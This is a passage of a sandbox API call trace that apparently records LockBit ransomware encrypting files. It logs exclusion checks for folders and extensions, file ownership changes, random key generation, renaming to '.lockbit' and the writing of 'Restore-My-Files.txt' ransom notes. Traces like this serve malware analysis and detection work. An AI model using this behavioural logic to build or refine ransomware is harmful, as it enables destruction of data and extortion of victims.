lpString2="tor browser") returned -1 [0077.150] lstrcmpiW (lpString1="BabyBoy", lpString2="boot") returned -1 [0077.150] lstrcmpiW (lpString1="BabyBoy", lpString2="system volume information") returned -1 [0077.150] lstrcmpiW (lpString1="BabyBoy", lpString2="perflogs") returned -1 [0077.150] lstrcmpiW (lpString1="BabyBoy", lpString2="google") returned -1 [0077.150] lstrcmpiW (lpString1="BabyBoy", lpString2="application data") returned 1 [0077.150] lstrcmpiW (lpString1="BabyBoy", lpString2="windows") returned -1 [0077.150] lstrcmpiW (lpString1="BabyBoy", lpString2="windows.old") returned -1 [0077.150] lstrcmpiW (lpString1="BabyBoy", lpString2="appdata") returned 1 [0077.150] lstrcmpiW (lpString1="BabyBoy", lpString2="Windows nt") returned -1 [0077.150] lstrcmpiW (lpString1="BabyBoy", lpString2="Msbuild") returned -1 [0077.150] lstrcmpiW (lpString1="BabyBoy", lpString2="Microsoft") returned -1 [0077.151] lstrcmpiW (lpString1="BabyBoy", lpString2="All users") returned 1 [0077.151] lstrcmpiW (lpString1="BabyBoy", lpString2="mozilla") returned -1 [0077.151] lstrcmpiW (lpString1="BabyBoy", lpString2="Microsoft.NET") returned -1 [0077.151] lstrcmpiW (lpString1="BabyBoy", lpString2="microsoft shared") returned -1 [0077.151] lstrcmpiW (lpString1="BabyBoy", lpString2="Internet Explorer") returned -1 [0077.151] lstrcmpiW (lpString1="BabyBoy", lpString2="common files") returned -1 [0077.151] lstrcmpiW (lpString1="BabyBoy", lpString2="opera") returned -1 [0077.151] lstrcmpiW (lpString1="BabyBoy", lpString2="Windows Journal") returned -1 [0077.151] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy") returned 52 [0077.151] wsprintfW (in: param_1=0x3d6ad00, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\*") returned 54 [0077.151] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6b120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6b120) returned 0x55fe78 [0077.615] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0077.615] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f9e8c42, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7d4443, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9fbd8be5, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.615] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0077.615] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0077.615] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70cace83, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70cace83, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49cc5f99, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x303d, dwReserved0=0x0, dwReserved1=0x0, cFileName="babyblue.png", cAlternateFileName="")) returned 1 [0077.615] lstrcmpiW (lpString1=".", lpString2="babyblue.png") returned -1 [0077.615] lstrcmpiW (lpString1="..", lpString2="babyblue.png") returned -1 [0077.615] PathFindExtensionW (pszPath="babyblue.png") returned=".png" [0077.615] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0077.615] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0077.615] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0077.615] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0077.615] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0077.616] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0077.616] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0077.616] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0077.616] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0077.616] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0077.616] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0077.616] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0077.616] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0077.616] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0077.616] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0077.616] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0077.616] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0077.616] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0077.616] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0077.616] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0077.616] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0077.616] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0077.616] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0077.616] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0077.616] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0077.616] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0077.616] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0077.616] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0077.616] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0077.616] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0077.617] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0077.617] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0077.617] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0077.617] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0077.617] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0077.617] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0077.617] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0077.617] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0077.617] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0077.617] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0077.617] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0077.617] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0077.617] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0077.617] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0077.617] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0077.617] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0077.617] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0077.617] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="babyblue.png") returned 1 [0077.617] lstrcmpiW (lpString1="ntldr", lpString2="babyblue.png") returned 1 [0077.617] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="babyblue.png") returned 1 [0077.617] lstrcmpiW (lpString1="bootsect.bak", lpString2="babyblue.png") returned 1 [0077.617] lstrcmpiW (lpString1="autorun.inf", lpString2="babyblue.png") returned -1 [0077.617] lstrcmpiW (lpString1="thumbs.db", lpString2="babyblue.png") returned 1 [0077.617] lstrcmpiW (lpString1="iconcache.db", lpString2="babyblue.png") returned 1 [0077.617] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\") returned="" [0077.617] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png") returned=".png" [0077.617] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0077.618] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0077.618] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0077.618] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0077.618] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0077.618] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0077.618] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0077.618] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0077.618] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0077.618] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0077.618] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0077.618] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0077.618] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0077.618] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0077.618] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0077.618] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0077.618] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0077.618] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0077.618] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0077.618] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0077.618] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0077.618] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0077.618] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0077.618] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0077.618] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0077.618] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0077.618] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0077.619] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0077.619] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png.lockbit") returned 73 [0077.619] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyblue.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0077.619] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0077.620] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0077.620] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0077.620] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0077.620] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0077.620] RtlFreeAnsiString (AnsiString="\\") [0077.620] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0077.620] malloc (_Size=0x200) returned 0x77d800 [0077.621] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0077.621] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0077.621] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0077.621] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0077.621] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0077.622] CloseHandle (hObject=0x3b8) returned 1 [0077.622] free (_Block=0x77d800) [0077.622] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyblue.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0077.622] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0077.622] malloc (_Size=0x40068) returned 0x1fb18c0 [0077.622] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=12349) returned 1 [0077.622] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.623] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.623] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0077.623] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.623] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.623] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0077.631] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0077.633] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0077.633] malloc (_Size=0xa8) returned 0x1ff1e60 [0077.634] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xa8, FileInformationClass=0xa) returned 0x0 [0077.634] free (_Block=0x1ff1e60) [0077.634] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy") returned 1 [0077.634] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt") returned 73 [0077.634] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0077.634] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0077.635] malloc (_Size=0x40068) returned 0x3d70048 [0077.635] WriteFile (in: hFile=0x3ac, lpBuffer=0x1fa30f8*, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x1fa30f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0077.636] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70d1f29a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70d1f29a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49cec0f7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5354a, dwReserved0=0x0, dwReserved1=0x0, cFileName="BabyBoyMainBackground.wmv", cAlternateFileName="")) returned 1 [0077.636] lstrcmpiW (lpString1=".", lpString2="BabyBoyMainBackground.wmv") returned -1 [0077.636] lstrcmpiW (lpString1="..", lpString2="BabyBoyMainBackground.wmv") returned -1 [0077.636] PathFindExtensionW (pszPath="BabyBoyMainBackground.wmv") returned=".wmv" [0077.636] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0077.636] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0077.636] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0077.636] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0077.636] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0077.636] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0077.636] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0077.636] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0077.636] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0077.636] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0077.636] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0077.636] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0077.637] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0077.637] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0077.637] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0077.637] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0077.637] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0077.637] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0077.637] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0077.637] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0077.637] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0077.637] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0077.637] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0077.637] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0077.637] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0077.637] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0077.637] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0077.637] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0077.637] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0077.637] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0077.637] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0077.637] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0077.637] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0077.637] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0077.637] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0077.638] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0077.638] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0077.638] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0077.638] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0077.638] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0077.638] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0077.638] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0077.638] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0077.638] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0077.638] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0077.638] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0077.638] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0077.638] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BabyBoyMainBackground.wmv") returned 1 [0077.638] lstrcmpiW (lpString1="ntldr", lpString2="BabyBoyMainBackground.wmv") returned 1 [0077.638] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BabyBoyMainBackground.wmv") returned 1 [0077.638] lstrcmpiW (lpString1="bootsect.bak", lpString2="BabyBoyMainBackground.wmv") returned 1 [0077.638] lstrcmpiW (lpString1="autorun.inf", lpString2="BabyBoyMainBackground.wmv") returned -1 [0077.638] lstrcmpiW (lpString1="thumbs.db", lpString2="BabyBoyMainBackground.wmv") returned 1 [0077.638] lstrcmpiW (lpString1="iconcache.db", lpString2="BabyBoyMainBackground.wmv") returned 1 [0077.638] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\") returned="" [0077.638] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv") returned=".wmv" [0077.638] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0077.638] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0077.639] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0077.639] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0077.639] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0077.639] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0077.639] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0077.639] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0077.639] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0077.639] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0077.639] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0077.639] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0077.639] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0077.639] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0077.639] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0077.639] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0077.639] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0077.639] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0077.639] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0077.639] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0077.639] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0077.639] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0077.639] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0077.639] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0077.640] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0077.640] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0077.640] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0077.640] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0077.640] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv.lockbit") returned 86 [0077.640] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0077.644] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0077.644] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0077.644] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0077.644] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0077.644] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0077.644] RtlFreeAnsiString (AnsiString="\\") [0077.644] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3ac) returned 0x0 [0077.644] malloc (_Size=0x200) returned 0x77d800 [0077.644] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0077.645] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0077.645] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0077.645] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0077.645] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0077.645] CloseHandle (hObject=0x3ac) returned 1 [0077.645] free (_Block=0x77d800) [0077.645] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0077.646] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0077.646] malloc (_Size=0x40068) returned 0x3d70048 [0077.646] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=341322) returned 1 [0077.646] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.646] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.646] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0077.646] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.647] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.647] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 